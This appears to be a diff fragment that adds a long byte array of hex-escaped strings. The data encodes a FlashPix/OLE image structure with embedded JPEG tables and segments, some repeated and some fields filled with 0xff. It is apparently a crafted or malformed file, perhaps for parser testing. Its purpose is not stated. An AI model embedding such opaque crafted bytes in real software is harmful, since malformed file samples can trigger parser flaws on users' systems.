+"\x01\x7d\x33\x56\xa8\xa0\x0a\x91\xc3\x24\x79\xd8\x81\x73\xe8\x68"
+"\x96\x29\xe4\x8c\xa9\x03\x91\xeb\x56\xe8\xa0\x00\xff\xd9\x05\xc9"
+"\x27\x70\x42\x80\x76\xeb\x9a\xa8\xbb\x32\x64\xae\xac\x4b\x45\x14"
+"\x54\x94\x00\xff\xd9\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08"
+"\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x11\x00\x02\x01\x02\x04\x04"
+"\x03\x04\x07\x05\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04"
+"\x05\x21\x31\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14"
+"\x42\x91\xa1\xb1\xc1\x09\x23\x33\x52\xf0\x15\x62\x72\xd1\x0a\x16"
+"\x24\x34\xe1\x25\xf1\x17\x18\x19\x1a\x26\x27\x28\x29\x2a\x35\x36"
+"\x37\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56"
+"\x57\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76"
+"\x77\x78\x79\x7a\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94"
+"\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2"
+"\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9"
+"\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7"
+"\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xd9\x21\x31"
+"\x41\x00\x00\x00\x32\x02\x00\x00\xff\xd8\xff\xdb\x00\x43\x00\x0c"
+"\x08\x09\x0a\x09\x07\x0c\x0a\x09\x0a\x0d\x0c\x0c\x0e\x12\x1e\x13"
+"\x12\x10\x10\x12\x25\x1a\x1c\x16\x1e\x2c\x26\x2e\x2d\x2b\x26\x2a"
+"\x29\x30\x36\x45\x3b\x30\x33\x42\x34\x29\x2a\x3c\x52\x3d\x42\x48"
+"\x4a\x4e\x4f\x4e\x2f\x3a\x55\x5b\x55\x4c\x5b\x45\x4c\x4e\x4b\xff"
+"\xdb\x00\x43\x01\x0c\x0d\x0d\x12\x0f\x12\x23\x13\x13\x23\x4b\x32"
+"\x2a\x32\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\x4b\x4b\x4b\x4b\xff\xc4\x01\xa2\x00\x00\x01\x05\x01\x01\x01\x01"
+"\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06"
+"\x07\x08\x09\x0a\x0b\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05"
+"\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31"
+"\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23\x42"
+"\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17\x18"
+"\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a\x43"
+"\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63"
+"\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x83"
+"\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a"
+"\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8"
+"\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6"
+"\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1\xf2"
+"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\x01\x00\x03\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06"
+"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00"
+"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80"
+"\x0a\x28\xa2\x80\x0a\xab\x75\x6d\x34\xcf\xba\x3b\x97\x88\x63\x1b"
+"\x57\xbd\x5a\xa6\xc8\xdb\x10\xb6\x0b\x60\x74\x1d\xe8\x02\x99\xb3"
+"\xba\x3f\xf2\xfc\xe3\xf0\x14\x7d\x92\xe8\x9f\xf8\xfe\x71\xc7\x65"
+"\x1d\x7d\x69\x0e\xa5\xc9\x02\xda\x52\x41\xc6\x31\xd6\x94\x6a\x1b"
+"\x90\xb0\xb6\x94\x10\xe1\x70\x46\x09\xfa\x50\x05\xea\x28\xa6\x97"
+"\x50\x76\xe7\x9f\x41\x40\x0e\xa2\xa1\x96\x61\x1c\x65\xdc\xac\x68"
+"\x07\x08\x09\x0a\x0b\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05"
+"\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06"
+"\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xa1\xb1"
+"\xc1\x09\x23\x33\x52\xf0\x15\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25"
+"\xf1\x17\x18\x19\x1a\x26\x27\x28\x29\x2a\x35\x36\x37\x38\x39\x3a"
+"\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a"
+"\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a"
+"\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98"
+"\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6"
+"\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4"
+"\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2"
+"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xd9\x01\x02\x13\x00\x00\x00"
+"\x04\x00\x00\x00\x41\x00\x00\x00\x32\x02\x00\x00\xff\xd8\xff\xdb"
+"\x00\x43\x00\x0c\x08\x09\x0a\x09\x07\x0c\x0a\x09\x0a\x0d\x0c\x0c"
+"\x0e\x12\x1e\x13\x12\x10\x10\x12\x25\x1a\x1c\x16\x1e\x2c\x26\x2e"
+"\x2d\x2b\x26\x2a\x29\x30\x36\x45\x3b\x30\x33\x42\x34\x29\x2a\x3c"
+"\x52\x3d\x42\x48\x4a\x4e\x4f\x4e\x2f\x3a\x55\x5b\x55\x4c\x5b\x45"
+"\x4c\x4e\x4b\xff\xdb\x00\x43\x01\x0c\x0d\x0d\x12\x0f\x12\x23\x13"
+"\x13\x23\x4b\x32\x2a\x32\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\xff\xc4\x01\xa2\x00\x00\x01\x05"
+"\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02"
+"\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x10\x00\x02\x01\x03\x03\x02"
+"\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11"
+"\x05\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91"
+"\xa1\x08\x23\x42\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09"
+"\x0a\x16\x17\x18\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37"
+"\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57"
+"\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77"
+"\x78\x79\x7a\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96"
+"\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4"
+"\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2"
+"\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8"
+"\xe9\xea\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\x01\x00\x03\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02"
+"\x00\x00\x00\x00\x13\x00\x00\x00\x01\x00\x00\x00\x13\x10\x00\x00"
+"\x00\x00\x00\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80"
+"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
+"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
+"\x48\x00\x00\x00\xed\x3f\x91\x1d\x10\xf8\xc7\x4c\xba\x77\x18\xb2"
+"\x0a\xef\x0a\x49\x48\x00\x00\x00\x00\x6a\x61\x56\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x13\x10\x00\x00\x01\x00\x00\x00"
+"\x01\x00\x00\x00\x13\x10\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00"
+"\x13\x00\x00\x00\x01\x00\x00\x00\x04\x10\x00\x00\x04\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\xb5\xbf\x94\x3f\x00\x00\x80\x3f"
+"\x04\x00\x00\x00\xb5\xbf\x94\x3f\x3b\x5f\xdc\xa2\x27\x52\xc1\xb6"
+"\x00\x3e\xb9\xaa\xfe\x76\xa5\x79\xc4\x11\x0b\x38\x8f\xf1\xcd\xcb"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x6e\x61\x56\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x6e\x61\x56"
+"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00"
+"\x34\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x24\x00\x00\x00"
+"\x80\x00\x00\x00\x6e\x00\x00\x00\x04\x00\x00\x00\x40\x00\x00\x00"
+"\x40\x00\x00\x00\x03\x00\x00\x00\x24\x00\x00\x00\x10\x00\x00\x00"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00"
+"\x3f\x89\xce\x2a\x13\x24\xb3\x71\x14\x65\x81\xfe\x29\x06\x17\xf2"
+"\xea\x69\xd8\x4d\x96\x5a\x45\x5e\xa6\xab\x9b\xc2\xe7\x6d\xbc\x66"
+"\x43\xed\xd0\x7d\x4f\x4a\x55\xb3\x0d\x83\x70\xfe\x6e\x3f\x84\x0d"
+"\xaa\x3f\x0a\x68\x63\x72\x36\x5b\xfc\x90\x77\x91\x7f\x8b\xd9\x7f"
+"\x52\x00\x65\x00\x73\x00\x6f\x00\x6c\x00\x75\x00\x74\x00\x69\x00"
+"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x31\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x20\x00\x01\x01\x13\x00\x00\x00\x0d\x00\x00\x00\x11\x00\x00\x00"
+"\x00\x61\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b"
+"\x00\x00\x00\x00\xe0\x40\xaf\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b"
+"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
+"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00"
+"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x2a\x00\x02\x01\x12\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x65\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00"
+"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
+"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00"
+"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x66\x00\x00\x00\x9e\x08\x00\x00\x00\x00\x00\x00"
+"\x52\x00\x65\x00\x73\x00\x6f\x00\x6c\x00\x75\x00\x74\x00\x69\x00"
+"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x20\x00\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\x14\x00\x00\x00"
+"\x00\x61\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b"
+"\x00\x00\x00\x00\x20\x4e\xb2\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b"
+"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00"
+"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00"
+"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80"
+"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
+"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
+"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
+"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00"
+"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
+"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a"
+"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
+"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
+"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a"
+"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00"
+"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8"
+"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01"
+"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f"
+"\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x6c\x8e\x91\xc6\xd2"
+"\x48\xc1\x51\x41\x2c\xc4\xe0\x00\x3b\xd3\xab\x1b\xc4\xb0\x5c\xea"
+"\x16\xb1\x69\x36\xdb\xe3\x5b\xc6\x2b\x3c\xe1\x72\x23\x88\x0c\xb7"
+"\xe2\xdc\x2e\x3d\xcf\xa5\x00\x58\xd2\xb5\x9b\x4d\x4f\x4a\xfe\xd0"
+"\x8d\x8c\x31\x29\x60\xe2\x5f\x94\xc7\x8f\xef\x67\xa7\x18\x3f\x42"
+"\x2a\x27\xf1\x05\x8a\x6a\x0b\x01\x9e\x0f\x20\xc2\xf2\x9b\x9f\x34"
+"\x6d\x05\x5d\x57\x6f\xd7\x2d\xeb\xda\xb1\x75\x2d\x33\x51\xb2\x83"
+"\x54\x84\x3c\xda\x8c\x7a\x9d\xa4\x80\x94\x84\x29\x49\x55\x30\xa3"
+"\x0b\xc7\xcc\xbc\x67\xd5\x40\xef\x56\xaf\x60\x4b\x3f\x11\x69\x97"
+"\x4f\xa6\x4b\x2d\xad\xbd\x9b\xc7\xbe\x28\x77\x88\x18\xb2\xe0\xe0"
+"\x73\xd0\x11\xc0\xc8\xfa\x50\x07\x4d\x45\x14\x50\x01\x45\x14\x50"
+"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50"
+"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50"
+"\x01\x45\x14\x50\x01\x59\x7a\xd6\xa7\x3e\x9e\xf6\x51\x5a\xda\x8b"
+"\x99\xaf\x26\xf2\x54\x33\xec\x0a\x76\x96\xc9\x38\x3c\x0c\x73\x5a"
+"\x95\x9f\xa8\xd8\xc9\x77\x7f\xa6\xdc\x23\xaa\xad\xa4\xed\x2b\x83"
+"\xd4\x83\x1b\x2f\x1f\x8b\x0a\x00\xff\xd9\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00"
+"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03"
+"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xe8\xae\xed\x67\xb5\xfb"
+"\x54\x37\x11\x49\x06\x09\xf3\x55\xc1\x5c\x0e\xbc\xf4\xa8\xe0\xd4"
+"\xf4\xfb\x88\x64\x9a\x0b\xeb\x69\x62\x8b\x99\x1d\x25\x52\x13\xea"
+"\x73\xc5\x73\x53\xd9\x5c\x5d\xb5\xed\xf5\xbd\x84\xab\x63\x25\xcc"
+"\x12\xb5\x9b\x26\xd6\xb8\x09\x9d\xed\xb0\xfa\xe5\x38\x38\x2d\xe5"
+"\xfb\xd2\x6b\xd1\x36\xae\xb7\x33\xe9\xd6\x17\x2a\x12\xc2\x68\xa4"
+"\x77\x81\xa3\x69\x8b\x01\xb6\x30\x08\x04\xe0\x82\x73\xdb\xa0\xea"
+"\x68\x03\xa6\x7d\x53\x4f\x4b\x6f\xb4\x3d\xf5\xba\xc3\xb8\xa7\x98"
+"\x64\x1b\x4b\x0e\xa3\x3e\xbc\x52\xc9\xa8\xd8\xc5\x66\xb7\x72\xde"
+"\x5b\xa5\xb3\xe0\x2c\xc6\x40\x11\xb3\xe8\x7a\x56\x16\xb1\x65\x34"
+"\x1a\xed\x9d\xda\x3d\xc4\x36\x71\xdb\x18\x50\xdb\x40\xb2\xf9\x2d"
+"\x9c\x9f\x94\xa9\x20\x11\x81\x90\x3f\x87\x07\xad\x53\x92\xcb\xca"
+"\xd2\x7e\xd5\xb3\x52\x4b\x83\x74\xf3\xc0\xcd\x68\xae\x43\x6c\xda"
+"\x77\x44\xa3\x85\x71\x9e\x0e\x0e\x4e\x72\x09\xa0\x0e\xaa\xeb\x50"
+"\xb2\xb3\x44\x7b\xbb\xb8\x20\x59\x3e\xe1\x92\x40\xbb\xbe\x99\xeb"
+"\x4b\x2d\xf5\x9c\x36\x82\xee\x5b\xa8\x52\xdc\xe0\x89\x4b\x80\xa7"
+"\x3d\x30\x7a\x56\x0d\xab\xcd\x63\xaa\xb5\xf6\xab\xa7\xcb\x9b\x9b"
+"\x58\x84\x6d\x04\x46\x51\x6e\x42\xfc\xf1\x61\x41\x20\x6e\x39\x07"
+"\xa1\xcf\xb5\x43\xa8\x5b\x3b\xc9\xa6\x5f\x5b\xda\x5d\x58\x59\xc4"
+"\x66\x26\x38\xad\xd1\x9e\x27\x62\x31\x21\x8f\x07\xa8\x0d\xd0\x64"
+"\x6e\xfa\xd0\x07\x48\xb7\xf6\x6f\x6c\xb7\x2b\x77\x01\x81\x8e\xd5"
+"\x90\x48\x36\x93\x9c\x63\x3e\xb9\xa2\xd2\xfa\xd2\xf9\x19\xec\xee"
+"\xa1\xb8\x55\x38\x63\x13\x86\x00\xfe\x15\xca\x1d\x31\xae\x6d\x24"
+"\x93\xec\xf7\xb3\xa5\xce\xa1\x6c\xce\xb7\x10\xaa\x6f\x55\x71\xb9"
+"\xf6\x28\x18\x18\xea\x58\x64\x85\x15\x73\x5c\xd3\xaf\x2e\x35\x0b"
+"\xf5\xb1\x80\xed\x9a\xc2\x35\x20\x7c\x8b\x29\x59\x09\x31\xee\xec"
+"\x4a\x92\x3f\xe0\x54\x01\xd3\xd1\x45\x14\x00\x51\x45\x14\x00\x51"
+"\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51"
+"\x45\x14\x00\x51\x45\x14\x01\x88\x75\x3d\x52\x7b\xa7\xb3\xd3\xed"
+"\x2d\x64\x9a\xd9\x54\x5c\xcb\x2c\xac\xb1\xab\x90\x0e\xc5\xc2\x92"
+"\x78\x20\xe7\x8c\x64\x54\x30\xf8\x99\xcd\xb5\xdb\x5c\xe9\xd2\x45"
+"\x73\x05\xd2\xda\x25\xb2\xb8\x63\x2c\x85\x41\x00\x1e\x06\x39\xce"
+"\x7d\x06\x7d\xaa\x79\x2c\xb5\x3b\x1d\x52\xe6\xeb\x4a\x16\xd3\xc3"
+"\x78\x43\xcb\x04\xee\x63\x29\x20\x50\xbb\x95\x80\x39\x04\x01\x90"
+"\x47\x6e\x0f\x35\x4e\x2f\x0e\xea\x0f\x05\xdc\xb7\x57\xb0\xfd\xba"
+"\x4b\xc4\xbd\x86\x58\xd0\xec\x46\x54\x0a\x14\x8c\xf2\xb8\x05\x7a"
+"\xf2\x39\xeb\x40\x1a\x36\xb3\xeb\x26\xe1\x22\xd4\x34\xfb\x6f\x26"
+"\x5c\x83\x25\xb5\xc1\x6f\x2b\x8f\xe2\x0c\x01\x39\xe9\x91\xf9\x56"
+"\x4e\x97\xad\x4a\xb6\x5a\x4d\x96\x91\xa6\x86\x37\x76\x86\x74\x12"
+"\xdc\x12\x22\x00\x8f\xbc\xc4\x12\x47\xcd\xfc\xab\x62\xd4\xeb\x92"
+"\x5d\x46\x6f\x12\xc6\xde\x04\xce\xf1\x13\xb4\x8d\x21\xc7\x6c\x85"
+"\xda\x33\xcf\x7e\x95\x4f\x44\xd0\xae\x34\xe9\x74\xd7\x96\x58\xdc"
+"\x5a\x58\x35\xab\xed\xcf\x2c\x59\x0e\x47\xb7\xca\x68\x00\x6f\x11"
+"\xfd\x96\xc2\xf1\xb5\x1b\x75\x4b\xcb\x49\x96\x06\x8a\x39\x01\x59"
+"\x1d\xc0\x29\xb5\x8e\x30\x0e\xe1\xd7\xa6\x0f\xa5\x25\x97\x88\x65"
+"\xfe\xd0\x82\xd7\x50\xfe\xcf\xff\x00\x4a\x62\x91\x3d\x9d\xd7\x9b"
+"\xb5\xb0\x4e\xd6\x04\x03\xd0\x1e\x47\x19\xf4\xc8\xa2\xfb\xc3\xb2"
+"\x5e\x4b\xa9\xc8\x66\x88\x3d\xc4\xf0\xdc\x5b\x96\x5d\xc1\x1a\x35"
+"\x03\xe6\x1d\xc1\x20\xfe\x06\x9f\xa7\xe9\xb7\xa3\x50\x8a\x7b\x8b"
+"\x3d\x32\xc6\x28\x41\xca\xda\xa6\xf6\x94\xe3\xfb\xc5\x46\xd1\xdf"
+"\x8e\x7d\xe8\x02\x6f\x16\x4f\x25\xbf\x86\x2f\xde\x16\x2b\x2b\x47"
+"\xe5\xa3\x0e\xa1\x98\x85\x1f\xa9\xa8\xbe\xdb\x73\x6d\xac\x43\xa0"
+"\xe9\xf6\x88\xe9\x0d\xac\x72\xb4\xd2\xca\x40\x54\xdc\x53\x18\xc1"
+"\x25\xb0\xbc\x53\xfc\x60\x8c\xfe\x16\xbd\x64\x1b\x8c\x4a\xb3\x63"
+"\xd4\x23\x07\x3f\xa2\xd5\x88\x6c\xd9\xb5\xe9\x35\x44\x91\x1a\x19"
+"\xad\x23\x85\x40\xeb\x90\xce\xd9\xfa\x61\x85\x00\x00\xff\xd9\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00"
+"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
+"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xab"
+"\x6d\x4f\x4f\xbb\x9d\xa1\xb5\xbe\xb7\x9e\x55\x19\x29\x1c\xa1\x88"
+"\x1f\x41\x4a\x9a\x8d\x8b\xde\x1b\x34\xbc\xb7\x6b\x91\x9c\xc2\x24"
+"\x05\x86\x3a\xf1\xd6\xb3\xa2\xb9\xb5\xbc\x68\x20\xb5\xd2\xee\x61"
+"\x95\x11\xb6\x49\x25\xaf\x96\x2d\x4e\xd2\x3a\x9c\x0e\xf8\xc2\xe7"
+"\xf2\xac\x0b\x1d\x3a\x6f\xec\xfb\x1d\x2e\x5f\xed\x31\x34\x52\x21"
+"\x92\x34\xb5\x8d\x56\x36\x52\x09\x90\x4a\x57\x04\x64\x13\x90\x4b"
+"\x1f\xa9\x34\x01\xd5\xeb\x3a\x8b\xe9\xb6\xb1\xc9\x15\xbf\xda\x25"
+"\x96\x64\x85\x23\xdf\xb3\x25\x8e\x39\x3d\xaa\x0b\x4d\x5e\x63\x7d"
+"\x1d\x9e\xa7\xa7\xc9\x63\x34\xd9\xf2\x5b\xcc\x12\x47\x21\x1c\x95"
+"\x0c\x3a\x1c\x73\x82\x07\x00\xfa\x53\x3c\x4e\xb2\x7d\x92\xce\x58"
+"\xe1\x96\x61\x0d\xec\x32\xba\xc4\x85\xd8\x28\x6e\x4e\x07\x26\xa1"
+"\x92\x79\x75\xbd\x4e\xc5\x20\xb2\xbb\x82\xda\xd2\x6f\xb4\x49\x3d"
+"\xc4\x46\x2c\x90\xac\x15\x54\x1e\x49\x3b\xb9\x38\xc0\x03\xde\x80"
